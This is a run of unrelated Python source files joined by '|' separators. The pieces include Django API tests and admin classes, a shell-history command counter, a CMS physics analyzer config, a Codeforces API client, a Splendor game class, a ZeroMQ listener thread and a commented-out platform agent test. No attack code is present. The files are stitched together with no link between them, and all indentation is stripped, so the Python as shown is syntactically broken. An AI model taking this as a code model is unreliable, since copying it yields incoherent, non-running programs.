"""Test that login is required for retrieving states"""
url = states_url(sample_country().name)
res = self.client.get(url)
self.assertEqual(res.status_code, status.HTTP_403_FORBIDDEN)
class PrivateStatesApiTests(TestCase):
"""Test the authorized country API"""
def setUp(self):
self.user = get_user_model().objects.create_user(
'test@gmail.com',
'test123345'
)
self.client = APIClient()
self.client.force_authenticate(self.user)
def test_retrieve_states(self):
"""Test retrieving states"""
self.country = sample_country()
State.objects.create(
name='Dhaka',
country=self.country
)
State.objects.create(
name='Chattagram',
country=self.country
)
url = states_url(self.country.name)
res = self.client.get(url)
states = State.objects.filter(
country__name=self.country.name).order_by('-name')
serializer = StateSerializer(states, many=True)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(res.data, serializer.data)
|
import json
import os
import pprint
history = {}
home = os.path.expanduser('~')
history_directory = home + "/.bash_history"
history_file = open(history_directory, 'r')
for command in history_file:
#sanitize command and split into arguments
command = command.strip("\n")
args = command.split(" ")
args = [arg for arg in args if arg != '']
command = args[0]
if len(args) > 1:
args = args[1:]
else:
args = ['']
if command in history:
history[command]["count"]+=1
else:
history[command] = {
"count": 1,
"args": {},
}
for arg in args:
if arg in history[command]["args"]:
history[command]["args"][arg]["count"]+=1
else:
history[command]["args"][arg] = {
"count": 1,
}
data = json.dumps(history)
print(data)
# pp = pprint.PrettyPrinter()
# pp.pprint(history)
|
import FWCore.ParameterSet.Config as cms
# File: RecHits.cfi
# Author: B. Scurlock
# Date: 03.04.2008
#
# Fill validation histograms for ECAL and HCAL RecHits.
ECALAnalyzer = cms.EDAnalyzer(
"ECALRecHitAnalyzer",
EBRecHitsLabel = cms.InputTag("ecalRecHit","EcalRecHitsEB"),
EERecHitsLabel = cms.InputTag("ecalRecHit","EcalRecHitsEE"),
Debug = cms.bool(False),
FineBinning = cms.untracked.bool(True),
FolderName = cms.untracked.string("JetMET/ECALRecHits")
)
HCALAnalyzer = cms.EDAnalyzer(
"HCALRecHitAnalyzer",
HORecHitsLabel = cms.InputTag("horeco"),
HBHERecHitsLabel = cms.InputTag("hbhereco"),
Debug = cms.bool(False),
HFRecHitsLabel = cms.InputTag("hfreco"),
FineBinning = cms.untracked.bool(True),
FolderName = cms.untracked.string("JetMET/HCALRecHits")
)
|
"""
"""
import pytest
class TestCommon(object):
storage = {}
@pytest.fixture()
def number(self, pytestconfig):
return int(pytestconfig.getoption('n'))
@pytest.fixture()
def text(self, pytestconfig):
return pytestconfig.getoption('t')
@pytest.fixture()
def number_doubled(self, number):
return number * 2
|
import logging
from zope.interface import implements
from twisted.internet import defer
from lbrynet.cryptstream.CryptBlob import CryptBlobInfo
from lbrynet.interfaces import IMetadataHandler
log = logging.getLogger(__name__)
class EncryptedFileMetadataHandler(object):
implements(IMetadataHandler)
def __init__(self, stream_hash, stream_info_manager, download_manager):
self.stream_hash = stream_hash
self.stream_info_manager = stream_info_manager
self.download_manager = download_manager
self._final_blob_num = None
######### IMetadataHandler #########
@defer.inlineCallbacks
def get_initial_blobs(self):
blob_infos = yield self.stream_info_manager.get_blobs_for_stream(self.stream_hash)
formatted_infos = self._format_initial_blobs_for_download_manager(blob_infos)
defer.returnValue(formatted_infos)
def final_blob_num(self):
return self._final_blob_num
######### internal calls #########
def _format_initial_blobs_for_download_manager(self, blob_infos):
infos = []
for i, (blob_hash, blob_num, iv, length) in enumerate(blob_infos):
if blob_hash is not None and length:
infos.append(CryptBlobInfo(blob_hash, blob_num, length, iv))
else:
if i != len(blob_infos) - 1:
raise Exception("Invalid stream terminator")
log.debug("Setting _final_blob_num to %s", str(blob_num - 1))
self._final_blob_num = blob_num - 1
return infos
|
import io
from PIL import Image, ImageTk
def get_img_data(site, maxsize=(500, 500), first=False):
"""
Generate image data using PIL
"""
image = Image.open(site)
image.thumbnail(maxsize)
if first: # tkinter is inactive the first time
bio = io.BytesIO()
image.save(bio, format="PNG")
del image
return bio.getvalue()
return ImageTk.PhotoImage(image)
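# Example usage (hypothetical file name): the very first call in a GUI program
# should pass first=True so raw PNG bytes are returned before a Tk root window
# exists; later calls can return an ImageTk.PhotoImage directly.
#
#   data = get_img_data("photo.png", maxsize=(300, 300), first=True)
#   photo = get_img_data("photo.png")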
|
# Add new commands in this file
# Also modify `__init__.py` to expose the methods in the package
from .utils import get
import json
from .config import Config
from random import sample
async def getUserInfo(handles):
"""
Refer: https://codeforces.com/apiHelp/methods#user.info
Fetches the user info of the given handles
Parameters
----------
handles: list<str>
List of handles of all users
Returns
-------
list
List of json objects containing user info for the handles
"""
methodName = 'user.info'
handleParams = 'handles=' + ';'.join(handles)
return await get(methodName, handleParams)
async def getContests(all=False):
"""
Refer: https://codeforces.com/apiHelp/methods#contest.list
Fetches information about all the future contests
Parameters
----------
all: bool
false: Only fetch official CF division contests
true: fetch all gym contests as well
Returns
-------
Returns a list of Contest objects.
See Also: https://codeforces.com/apiHelp/objects#Contest
"""
methodName = 'contest.list'
methodParam = 'gym=' + str(all)
# GET the json request
allContests = (await get(methodName, methodParam))['result']
# Filter the response for only future contests
# define the filter clause lambda
clause = lambda x: x['phase'] == "BEFORE"
futureContests = list(filter(clause,allContests))
return futureContests
async def getProblem(tags, counts=2):
"""
Refer: https://codeforces.com/apiHelp/methods#problemset.problems
Fetches a list of all problems filtered by tags
Parameters
----------
    tags: list
        List of tags to filter problems by
    counts: int
        Maximum number of problems to randomly sample (capped at Config['MAX_PROBLEMS'])
Returns
-------
List of Problem objects
See Also: https://codeforces.com/apiHelp/objects#Problem
"""
methodName = "problemset.problems"
methodParams = "tags=" + ";".join(tags)
# Get the json request
problems = await get(methodName, methodParams)
# Only get a max-amount (N) of problems
    # from the response problemset
counts = min(counts, Config['MAX_PROBLEMS'])
allProblems = problems['result']['problems']
lenProblems = len(allProblems)
# randomly select the N problems from the problemset
randomProblemsIdxs = sample(range(lenProblems), counts)
sampledProblems = [allProblems[i] for i in randomProblemsIdxs]
return sampledProblems
# For Testing
async def test():
# Add debug/testing code here
# resp = await getUserInfo(['sam6134'])
# resp_question = await getProblem(["implementation", "dp"])
resp = await getContests()
print(json.dumps(resp, indent=3))
return
if __name__ == "__main__":
import asyncio
loop = asyncio.get_event_loop()
loop.run_until_complete(test())
|
from django.template import (Node, Variable, TemplateSyntaxError, Library)
try:
from django.template.base import render_value_in_context
except ImportError:
from django.template.base import _render_value_in_context as render_value_in_context
from phrase.compat import TOKEN_TEXT, TOKEN_VAR, is_string_type
from django.utils import translation
from django.conf import settings
from phrase.settings import template_string_if_valid
from phrase.utils import PhraseDelegate
class PhraseBlockTranslateNode(Node):
def __init__(self, extra_context, singular, plural=None, countervar=None,
counter=None, message_context=None, trimmed=None):
self.extra_context = extra_context
self.singular = singular
self.plural = plural
self.countervar = countervar
self.counter = counter
self.message_context = message_context
self.trimmed = trimmed
def render_token_list(self, tokens):
result = []
vars = []
for token in tokens:
if token.token_type == TOKEN_TEXT:
result.append(token.contents)
elif token.token_type == TOKEN_VAR:
result.append('%%(%s)s' % token.contents)
vars.append(token.contents)
return ''.join(result), vars
def render(self, context, nested=False):
if self.message_context:
message_context = self.message_context.resolve(context)
else:
message_context = None
tmp_context = {}
for var, val in self.extra_context.items():
tmp_context[var] = val.resolve(context)
# Update() works like a push(), so corresponding context.pop() is at
# the end of function
context.update(tmp_context)
singular, vars = self.render_token_list(self.singular)
if self.plural and self.countervar and self.counter:
count = self.counter.resolve(context)
context[self.countervar] = count
plural, plural_vars = self.render_token_list(self.plural)
if message_context:
result = translation.npgettext(message_context, singular,
plural, count)
else:
result = translation.ungettext(singular, plural, count)
vars.extend(plural_vars)
else:
if message_context:
result = translation.pgettext(message_context, singular)
else:
# result = translation.ugettext(singular)
result = str(PhraseDelegate(singular, self.trimmed))
render_value = lambda v: render_value_in_context(
context.get(v, template_string_if_valid()), context)
data = dict([(v, render_value(v)) for v in vars])
context.pop()
# FIX
# try:
# result = result % data
# except (KeyError, ValueError):
# if nested:
# # Either string is malformed, or it's a bug
# raise TemplateSyntaxError("'blocktrans' is unable to format "
# "string returned by gettext: %r using %r" % (result, data))
# with translation.override(None):
# result = self.render(context, nested=True)
return result
class PhraseTranslateNode(Node):
def __init__(self, filter_expression, noop, asvar=None,
message_context=None, trimmed=None):
self.noop = noop
self.asvar = asvar
self.message_context = message_context
self.filter_expression = filter_expression
if is_string_type(self.filter_expression.var):
self.filter_expression.var = Variable("'%s'" %
self.filter_expression.var)
self.trimmed = trimmed
def render(self, context):
self.filter_expression.var.translate = not self.noop
if self.message_context:
self.filter_expression.var.message_context = (
self.message_context.resolve(context))
output = self.filter_expression.resolve(context)
value = render_value_in_context(output, context)
if self.asvar:
context[self.asvar] = str(PhraseDelegate(value, self.trimmed))
return ''
else:
return str(PhraseDelegate(self.filter_expression.var, self.trimmed))
|
from __future__ import annotations
class BroodError(Exception):
pass
class UnknownFormat(BroodError):
pass
|
import pytest
from porcupine import get_main_window
code = """\
with open(path) as f:
while True:
try:
line = f.readline().decode('utf-8')
except OSError:
break
print(repr(line))
print("foo")
"""
except_folded = """\
with open(path) as f:
while True:
try:
line = f.readline().decode('utf-8')
except OSError:
print(repr(line))
print("foo")
"""
while_folded = """\
with open(path) as f:
while True:
print("foo")
"""
# tkinter doesn't support -displaychars option of Text.get
def get_content(textwidget, include_elided):
if include_elided:
return textwidget.tk.eval(f'{textwidget} get 1.0 "end - 1 char"')
else:
return textwidget.tk.eval(f'{textwidget} get -displaychars 1.0 "end - 1 char"')
@pytest.fixture
def text(filetab):
text = filetab.textwidget
text.insert("1.0", code)
return text
def test_outermost(text):
text.mark_set("insert", "1.0")
get_main_window().event_generate("<<Menubar:Edit/Fold>>")
assert get_content(text, True) == code
assert get_content(text, False) == "with open(path) as f:\n"
def test_inner(text):
text.mark_set("insert", "2.0")
get_main_window().event_generate("<<Menubar:Edit/Fold>>")
assert get_content(text, True) == code
assert get_content(text, False) == while_folded
def test_leaving_blank_lines_behind(text):
text.mark_set("insert", "5.0")
get_main_window().event_generate("<<Menubar:Edit/Fold>>")
assert get_content(text, True) == code
assert get_content(text, False) == except_folded
# Make sure that when "..." is clicked, it does not leave an invisible character behind
def test_invisible_character_bug(text):
text.mark_set("insert", "5.0")
get_main_window().event_generate("<<Menubar:Edit/Fold>>")
[three_dots] = [text.nametowidget(name) for name in text.window_names()]
assert text.index("5.0 lineend") == "5.24"
text.update()
three_dots.event_generate("<Button-1>") # click it
assert text.index("5.0 lineend") == "5.23"
def test_doesnt_trigger_change_events(filetab):
filetab.textwidget.insert("1.0", 'if True:\n print("lol")')
events = []
filetab.textwidget.bind("<<ContentChanged>>", events.append, add=True)
# fold and unfold
filetab.textwidget.mark_set("insert", "1.0 lineend")
get_main_window().event_generate("<<Menubar:Edit/Fold>>")
filetab.textwidget.mark_set("insert", "1.0 lineend")
filetab.textwidget.event_generate("<BackSpace>")
assert filetab.textwidget.get("1.0", "end - 1 char") == 'if True:\n print("lol")'
# This should not trigger change events
assert not events
|
from typing import Dict, Set
from functools import reduce
from gym_splendor_code.envs.mechanics.enums import GemColor
class GemsCollection():
    '''This class is used to describe a collection of gems. It can be treated both as a wallet of gems or as the price
    of a single card.'''
def __init__(self,
gems_values_dict: Dict[GemColor, int] = None) -> None:
"""Creates a collection of gems.
Parameters:
_ _ _ _ _ _
        gems_values_dict: Dictionary with keys being gem colors and values being integers. If gems_values_dict is None,
        it creates a collection with all values set to zero."""
if gems_values_dict is None:
self.gems_dict = {gem_color : 0 for gem_color in GemColor}
else:
self.gems_dict = gems_values_dict
def value(self, gem_color):
"""Returns value of gem_color form this gems collection."""
return self.gems_dict[gem_color]
def sum(self):
return sum(self.gems_dict.values())
def __add__(self, other):
"""Adds other gems colletion to this one.
Parameters:
_ _ _ _ _ _
other: An object of class GemsCollection to be added.
Returns:
_ _ _ _ _ _
An object of class GemsCollection with a dictionary of color values, which is a key-wise sum.
"""
return GemsCollection({gem_color : self.gems_dict[gem_color] + other.gems_dict[gem_color] for gem_color in GemColor})
def __sub__(self, other):
"""Subtracts other gems colletion from this one.
Parameters:
_ _ _ _ _ _
other: An object of class GemsCollection to be subtracted.
Returns:
_ _ _ _ _ _
        An object of class GemsCollection with a dictionary of color values, which is a key-wise difference.
"""
return GemsCollection({gem_color : self.gems_dict[gem_color] - other.gems_dict[gem_color] for gem_color in GemColor})
def __le__(self, other):
"""Checks if this instance is smaller or equal to the other (gem-wise check).
Parameters:
_ _ _ _ _ _
other: An object of class GemsCollection to be compared.
Returns:
_ _ _ _ _ _
        Boolean value that is True if, for each gem color, the value of this collection on that color is <= the value
        of the other collection on that color.
"""
return reduce(lambda x, y: x and y, [self.gems_dict[gem_color] <= other.gems_dict[gem_color] for gem_color in
GemColor])
def __ge__(self, other):
"""Checks if this instance is greater or equal to the other (gem-wise check).
Parameters:
_ _ _ _ _ _
other: An object of class GemsCollection to be compared.
Returns:
_ _ _ _ _ _
        Boolean value that is True if, for each gem color, the value of this collection on that color is >= the value
        of the other collection on that color.
"""
return reduce(lambda x, y: x and y, [self.gems_dict[gem_color] >= other.gems_dict[gem_color] for gem_color in
GemColor])
def __mod__(self, other):
"""Subtracts other gems collection form self and then sets all negative values to zero.
Parameters:
_ _ _ _ _ _
other: An object of class GemsCollection to be subtracted and later made non-negative.
Returns:
_ _ _ _ _ _
Gems collection that is the result of this operation."""
return GemsCollection({gem_color : max(0, self.gems_dict[gem_color] - other.gems_dict[gem_color]) for
gem_color in GemColor})
def __neg__(self):
"""Returns gems collection with -values for each gem color."""
return GemsCollection({gem_color: -self.gems_dict[gem_color] for gem_color in GemColor})
def __eq__(self, other):
list_of_conditions = [self.value(gem_color) == other.value(gem_color) for gem_color in GemColor]
return reduce(lambda x, y: x and y, list_of_conditions)
def __repr__(self):
return self.gems_dict.__repr__().replace('GemColor.','')
def non_empty_stacks(self) -> Set[GemColor]:
return {gem_color for gem_color in GemColor if self.gems_dict[gem_color] > 0}
def non_empty_stacks_except_gold(self) -> Set[GemColor]:
return {gem_color for gem_color in GemColor if self.gems_dict[gem_color] > 0
and gem_color != GemColor.GOLD}
def __copy__(self):
return GemsCollection({gem_color : self.gems_dict[gem_color] for gem_color in GemColor})
def to_dict(self):
return [self.gems_dict[gem_color] for gem_color in GemColor]
def to_dict_neg(self):
return [ -self.gems_dict[gem_color] for gem_color in GemColor]
def get_colors_on_condition(self, cond):
return {gem_color for gem_color in GemColor if self.gems_dict[gem_color] >= cond
and gem_color != GemColor.GOLD}
def get_all_colors_on_condition(self, cond):
return {gem_color for gem_color in GemColor if self.gems_dict[gem_color] >= cond}
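# A minimal usage sketch illustrating the gem-wise arithmetic defined above;
# it relies only on the GemColor enum already imported in this module, and the
# starting values are illustrative.
if __name__ == "__main__":
    wallet = GemsCollection({gem_color: 3 for gem_color in GemColor})
    price = GemsCollection({gem_color: 1 for gem_color in GemColor})
    print(wallet - price)   # gem-wise difference
    print(price <= wallet)  # True: the wallet covers the price on every color
    print(wallet % price)   # subtract, then clip negative values to zero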
|
from django.contrib import admin
from django.utils.translation import ugettext_lazy as _
from adminsortable2.admin import SortableInlineAdminMixin
from real_estate.admin import (
AdminInlineImages,
MultiuploadInlinesContainerMixin,
)
from .models import (
ResaleApartment,
ResaleApartmentImage,
ResaleCharacteristic,
ResaleDecoration,
)
from .forms import ResaleApartmentForm, ResaleApartmentImageForm
class ResaleImageInline(
SortableInlineAdminMixin, admin.TabularInline, AdminInlineImages):
model = ResaleApartmentImage
form = ResaleApartmentImageForm
classes = ['collapse', ]
extra = 0
min_num = 0
fields = ('thumbnail', 'image')
readonly_fields = ('thumbnail', )
@admin.register(ResaleApartment)
class ResaleApartmentAdmin(MultiuploadInlinesContainerMixin, admin.ModelAdmin):
inlines = [ResaleImageInline, ]
form = ResaleApartmentForm
list_display_initial = (
'id', 'status', 'is_active', 'rooms', 'total_area',
'full_price', 'agency_price', 'fee', 'price',
'residental_complex',
)
list_filter_initial = ('rooms', 'residental_complex', )
list_display = list_display_initial
list_filter = list_filter_initial
list_display_links = (
'id', 'status', 'rooms', 'total_area'
)
list_editable = ('is_active', )
readonly_fields = ['id', 'date_added', 'modified_by']
filter_horizontal = ['characteristics']
def fee(self, obj):
return obj.fee
fee.short_description = _('комиссия')
def full_price(self, obj):
return obj.full_price
full_price.short_description = _("текущая стоимость")
fieldsets = None
# For multiupload by MultiuploadInlinesContainerMixin
related_inline_form = ResaleApartmentImageForm
related_inline_fk = 'apartment'
def get_fieldsets(self, request, obj=None):
self.fieldsets = self.dynamic_fieldset(request)
return super().get_fieldsets(request, obj)
def dynamic_fieldset(self, request):
"""
        Build the fieldsets dynamically based on the request user's permissions.
"""
deal_status_part_fields = (
'date_added',
('sold_date', 'previous_buy_date',),
'status',
'amount_of_owners',
'comment',
'related_mortgage',
'price',
'agency_price',
'agency_price_with_sales',
)
if request.user.has_perm('resale.can_add_change_delete_all_resale'):
deal_status_part_fields += ('created_by', 'modified_by',)
deal_status_part = (_('Информация по сделке'), {
'classes': ('collapse',),
'fields': deal_status_part_fields,
})
owner_part = (_('Информация по продавцу'), {
'classes': ('collapse',),
'fields': (('owner_name', 'owner_phone_number'),),
})
apartment_part_fields = (
'neighbourhood',
'residental_complex',
'street',
(
'building',
'building_block',
),
'coordinates',
'rooms',
(
'floor',
'number_of_storeys',
),
'section',
'apartment_number',
'building_type',
'home_series',
'date_of_construction',
(
'total_area',
'kitchen_area',
'balcony_area',
),
(
'celling_height',
'decoration',
),
'layout',
'description',
'characteristics'
)
apartment_part = (_('Информация по квартире'), {
'classes': ('collapse',),
'fields': apartment_part_fields,
})
fieldsets = (
(None, {
'fields': ('id', 'is_active',),
}),
deal_status_part,
owner_part,
apartment_part,
)
return fieldsets
def save_model(self, request, obj, form, change):
super().save_model(request, obj, form, change)
# Auto set user
if not change:
obj.created_by = request.user
if 'modified_by' not in form.changed_data:
obj.modified_by = request.user
obj.save()
def get_queryset(self, request):
qs = super(ResaleApartmentAdmin, self).get_queryset(request)
if request.user.has_perm('resale.can_add_change_delete_all_resale'):
return qs
return qs.filter(created_by=request.user)
def changelist_view(self, request, extra_context=None):
self.list_display = self.list_display_initial
self.list_filter = self.list_filter_initial
if request.user.has_perm('resale.can_add_change_delete_all_resale'):
self.list_display += ('created_by',)
self.list_filter = ('created_by',) + self.list_filter
return super(ResaleApartmentAdmin, self).changelist_view(
request, extra_context)
admin.site.register(ResaleCharacteristic)
admin.site.register(ResaleDecoration)
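# A hedged note (assumption, not shown in this file): the custom permission
# string 'resale.can_add_change_delete_all_resale' checked in get_queryset()
# and changelist_view() above is expected to be declared on the ResaleApartment
# model, e.g.:
#
#     class Meta:
#         permissions = (
#             ('can_add_change_delete_all_resale',
#              'Can add, change and delete all resale apartments'),
#         )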
|
import time
import threading
import zmq
import traceback
THREAD_DELAY_SEC = 0.05
SHOTS_BUFFER_SIZE = 100
'''
class DataEventCallBack(PyTango.utils.EventCallBack):
def __init__(self, parent_obj):
self.parent = parent_obj
return
def push_event(self, event_data):
try:
if not event_data.err:
player_name = "/".join(event_data.attr_name.split("/")[-4:-1])
ack_value = event_data.attr_value.value
ack_trg = event_data.attr_value.time.tv_sec
ack_attrname = event_data.attr_name.split("/")[-1]
if abs(ack_trg - self.parent.last_ack) > 10000:
# Fake trigger
return
self.parent.last_ack = ack_trg
self.parent.last_ack_time = time.time()
self.parent._data_buffer[ack_trg] = ack_value
if self.parent._data_buffer.has_key(ack_trg-SHOTS_BUFFER_SIZE):
del self.parent._data_buffer[ack_trg-SHOTS_BUFFER_SIZE]
#print "DAQ THREAD",player_name,ack_trg,ack_value
if (ack_trg == 0) and (self.parent.main_thread.max_triggers != 1):
# Postpone the first trigger, just to be sure that the sequence really started
return
elif (ack_trg == 1) and (self.parent.main_thread.max_triggers != 1):
# Notify main thread also the first data arrived (trg == 0)
self.parent.main_thread.notify_new_data(self.parent, 0)
# Notify main thread that new data arrived
self.parent.main_thread.notify_new_data(self.parent, ack_trg)
except Exception, e:
print e
'''
class DataAcqThread(threading.Thread):
#-----------------------------------------------------------------------------------
# __init__
#-----------------------------------------------------------------------------------
def __init__(self, parent_obj, zmq_pub_url, data_name, alias_name):
threading.Thread.__init__(self)
self._alive = True
self._started = False
self.main_thread = parent_obj
self.player_pub_url = zmq_pub_url
self.data_name = data_name.lower()
self.data_alias = alias_name
#
self.context = zmq.Context()
self.poller = zmq.Poller()
self.sub_sock = None
self._data_buffer = {}
self.last_ack = -1
self.last_ack_time = time.time()
self.myState = "STANDBY"
#
self.set_new_url(zmq_pub_url)
#-----------------------------------------------------------------------------------
# set_new_url
#-----------------------------------------------------------------------------------
def set_new_url(self, url):
try:
if self.sub_sock is not None:
self.poller.unregister(self.sub_sock)
self.sub_sock.close()
self.sub_sock = self.context.socket(zmq.SUB)
self.sub_sock.setsockopt(zmq.SUBSCRIBE, '')
self.sub_sock.connect("tcp://"+str(url))
self.poller.register(self.sub_sock, zmq.POLLIN)
except:
traceback.print_exc()
del self.sub_sock
self.sub_sock = None
#-----------------------------------------------------------------------------------
# run
#-----------------------------------------------------------------------------------
def run(self):
self.myState = "STANDBY"
while self._alive:
if self._started:
self.myState = "ON"
self.last_ack_time = time.time()
while (self._started):
socks = dict(self.poller.poll(1000))
if len(socks) > 0 and self.sub_sock in socks and socks[self.sub_sock] == zmq.POLLIN:
try:
reply = self.sub_sock.recv_pyobj()
if reply[0] == 'data' and (reply[1]).lower() == self.data_name:
self.main_thread.notify_new_data(self.data_alias,reply[2],reply[3],reply[4])
except:
traceback.print_exc()
if (time.time() - self.last_ack_time) > 20 :
self.myState = "OFF"
elif (self.myState != "ON") :
self.myState = "ON"
self.myState = "STANDBY"
time.sleep(THREAD_DELAY_SEC)
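# A hedged sketch of the publisher side this thread expects (names and the
# tuple fields beyond the first two are illustrative): a ZeroMQ PUB socket
# sending pickled tuples with send_pyobj(), where item 0 is the literal 'data'
# and item 1 is the data name matched case-insensitively in run() above.
#
#   import zmq
#   ctx = zmq.Context()
#   pub = ctx.socket(zmq.PUB)
#   pub.bind("tcp://*:5556")
#   pub.send_pyobj(('data', 'my_signal', trigger_number, value, timestamp))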
|
# #!/usr/bin/env python
#
# """
# @package ion.agents.platform.test.test_platform_agent_with_rsn
# @file ion/agents/platform/test/test_platform_agent_with_rsn.py
# @author Carlos Rueda
# @brief Test cases for platform agent interacting with RSN
# """
#
# __author__ = 'Carlos Rueda'
# __license__ = 'Apache 2.0'
#
# # The following can be prefixed with PLAT_NETWORK=single to exercise the tests
# # with a single platform (with no sub-platforms). Otherwise a small network is
# # used. See HelperTestMixin.
# # bin/nosetests -sv --nologcapture ion/agents/platform/test/test_platform_agent_with_rsn.py:TestPlatformAgent.test_resource_monitoring
# # bin/nosetests -sv --nologcapture ion/agents/platform/test/test_platform_agent_with_rsn.py:TestPlatformAgent.test_capabilities
# # bin/nosetests -sv ion/agents/platform/test/test_platform_agent_with_rsn.py:TestPlatformAgent.test_some_state_transitions
# # bin/nosetests -sv ion/agents/platform/test/test_platform_agent_with_rsn.py:TestPlatformAgent.test_get_set_resources
# # bin/nosetests -sv ion/agents/platform/test/test_platform_agent_with_rsn.py:TestPlatformAgent.test_some_commands
# # bin/nosetests -sv ion/agents/platform/test/test_platform_agent_with_rsn.py:TestPlatformAgent.test_resource_monitoring
# # bin/nosetests -sv ion/agents/platform/test/test_platform_agent_with_rsn.py:TestPlatformAgent.test_resource_monitoring_recent
# # bin/nosetests -sv ion/agents/platform/test/test_platform_agent_with_rsn.py:TestPlatformAgent.test_external_event_dispatch
# # bin/nosetests -sv ion/agents/platform/test/test_platform_agent_with_rsn.py:TestPlatformAgent.test_connect_disconnect_instrument
# # bin/nosetests -sv ion/agents/platform/test/test_platform_agent_with_rsn.py:TestPlatformAgent.test_check_sync
# # bin/nosetests -sv ion/agents/platform/test/test_platform_agent_with_rsn.py:TestPlatformAgent.test_execute_resource
# # bin/nosetests -sv ion/agents/platform/test/test_platform_agent_with_rsn.py:TestPlatformAgent.test_resource_states
# # bin/nosetests -sv ion/agents/platform/test/test_platform_agent_with_rsn.py:TestPlatformAgent.test_lost_connection_and_reconnect
# # bin/nosetests -sv ion/agents/platform/test/test_platform_agent_with_rsn.py:TestPlatformAgent.test_alerts
# #
#
#
# from ion.agents.platform.test.base_test_platform_agent_with_rsn import BaseIntTestPlatform
# from pyon.public import log, CFG
#
# from pyon.util.containers import get_ion_ts
#
# from interface.objects import AgentCommand
# from interface.objects import CapabilityType
# from interface.objects import AgentCapability
#
# from interface.objects import StreamAlertType, AggregateStatusType
#
# from pyon.core.exception import Conflict
#
# from pyon.event.event import EventSubscriber
#
# from ion.agents.platform.platform_agent import PlatformAgentState
# from ion.agents.platform.platform_agent import PlatformAgentEvent
# from ion.agents.platform.responses import NormalResponse
# from ion.agents.platform.rsn.rsn_platform_driver import RSNPlatformDriverState
# from ion.agents.platform.rsn.rsn_platform_driver import RSNPlatformDriverEvent
#
# from ion.services.dm.utility.granule.record_dictionary import RecordDictionaryTool
# from pyon.public import IonObject
# from pyon.util.containers import current_time_millis
# from ion.agents.platform.util import ntp_2_ion_ts
#
# from gevent import sleep
# from gevent.event import AsyncResult
# from mock import patch
# from pyon.public import CFG
# import unittest
# import os
#
# @patch.dict(CFG, {'endpoint': {'receive': {'timeout': 180}}})
# @unittest.skipIf((not os.getenv('PYCC_MODE', False)) and os.getenv('CEI_LAUNCH_TEST', False), 'Skip until tests support launch port agent configurations.')
# class TestPlatformAgent(BaseIntTestPlatform):
#
# def _create_network_and_start_root_platform(self, clean_up=None):
# """
# Call this at the beginning of each test. We need to make sure that
# the patched timeout is in effect for the actions performed here.
#
# @note this used to be done in setUp, but the patch.dict mechanism does
# *not* take effect in setUp!
#
# An addCleanup function is added to reset/shutdown the network and stop the
# root platform. Should avoid leaked processes/greenlet upon failing tests
# (except perhaps if they happen during the launch of the root platform).
#
# @param clean_up Not None to override default pre-cleanUp calls.
# """
# self._set_receive_timeout()
#
# self.p_root = None
#
# # NOTE The tests expect to use values set up by HelperTestMixin for
# # the following networks (see ion/agents/platform/test/helper.py)
# if self.PLATFORM_ID == 'Node1D':
# #self.p_root = self._create_small_hierarchy()
# instr_keys = ["SBE37_SIM_01", ]
# self.p_root = self._set_up_small_hierarchy_with_some_instruments(instr_keys)
#
# elif self.PLATFORM_ID == 'LJ01D':
# self.p_root = self._create_single_platform()
#
# else:
# self.fail("self.PLATFORM_ID expected to be one of: 'Node1D', 'LJ01D'")
#
# self._start_platform(self.p_root)
#
# def done():
# if self.p_root:
# try:
# if clean_up:
# clean_up()
# else:
# # default "done" sequence for most tests
# try:
# self._go_inactive()
# self._reset()
# finally: # attempt shutdown anyway
# self._shutdown()
# finally:
# self._stop_platform(self.p_root)
# self.p_root = None
# self.addCleanup(done)
#
# def _connect_instrument(self):
# #
# # TODO more realistic settings for the connection
# #
# port_id = self.PORT_ID
# instrument_id = self.INSTRUMENT_ID
# instrument_attributes = self.INSTRUMENT_ATTRIBUTES_AND_VALUES
#
# kwargs = dict(
# port_id = port_id,
# instrument_id = instrument_id,
# attributes = instrument_attributes
# )
# result = self._execute_resource(RSNPlatformDriverEvent.CONNECT_INSTRUMENT, **kwargs)
# log.info("CONNECT_INSTRUMENT = %s", result)
# self.assertIsInstance(result, dict)
# self.assertIn(port_id, result)
# self.assertIsInstance(result[port_id], dict)
# returned_attrs = self._verify_valid_instrument_id(instrument_id, result[port_id])
# if isinstance(returned_attrs, dict):
# for attrName in instrument_attributes:
# self.assertIn(attrName, returned_attrs)
#
# def _disconnect_instrument(self):
# # TODO real settings and corresp verification
#
# port_id = self.PORT_ID
# instrument_id = self.INSTRUMENT_ID
#
# kwargs = dict(
# port_id = port_id,
# instrument_id = instrument_id
# )
# result = self._execute_resource(RSNPlatformDriverEvent.DISCONNECT_INSTRUMENT, **kwargs)
# log.info("DISCONNECT_INSTRUMENT = %s", result)
# self.assertIsInstance(result, dict)
# self.assertIn(port_id, result)
# self.assertIsInstance(result[port_id], dict)
# self.assertIn(instrument_id, result[port_id])
# self._verify_instrument_disconnected(instrument_id, result[port_id][instrument_id])
#
# def _turn_on_port(self):
# # TODO real settings and corresp verification
#
# port_id = self.PORT_ID
#
# kwargs = dict(
# port_id = port_id
# )
# result = self._execute_resource(RSNPlatformDriverEvent.TURN_ON_PORT, **kwargs)
# log.info("TURN_ON_PORT = %s", result)
# self.assertIsInstance(result, dict)
# self.assertTrue(port_id in result)
# self.assertEquals(result[port_id], NormalResponse.PORT_TURNED_ON)
#
# def _turn_off_port(self):
# # TODO real settings and corresp verification
#
# port_id = self.PORT_ID
#
# kwargs = dict(
# port_id = port_id
# )
# result = self._execute_resource(RSNPlatformDriverEvent.TURN_OFF_PORT, **kwargs)
# log.info("TURN_OFF_PORT = %s", result)
# self.assertIsInstance(result, dict)
# self.assertTrue(port_id in result)
# self.assertEquals(result[port_id], NormalResponse.PORT_TURNED_OFF)
#
# def _get_resource(self):
# """
# Gets platform attribute values.
# """
# attrNames = self.ATTR_NAMES
# #
# # OOIION-631: use get_ion_ts() as a basis for using system time, which is
# # a string.
# #
# cur_time = get_ion_ts()
# from_time = str(int(cur_time) - 50000) # a 50-sec time window
# attrs = [(attr_id, from_time) for attr_id in attrNames]
# kwargs = dict(attrs=attrs)
# cmd = AgentCommand(command=PlatformAgentEvent.GET_RESOURCE, kwargs=kwargs)
# retval = self._execute_agent(cmd)
# attr_values = retval.result
# self.assertIsInstance(attr_values, dict)
# for attr_name in attrNames:
# self._verify_valid_attribute_id(attr_name, attr_values)
#
# def _set_resource(self):
# attrNames = self.ATTR_NAMES
# writ_attrNames = self.WRITABLE_ATTR_NAMES
#
# # do valid settings:
#
# # TODO more realistic value depending on attribute's type
# attrs = [(attrName, self.VALID_ATTR_VALUE) for attrName in attrNames]
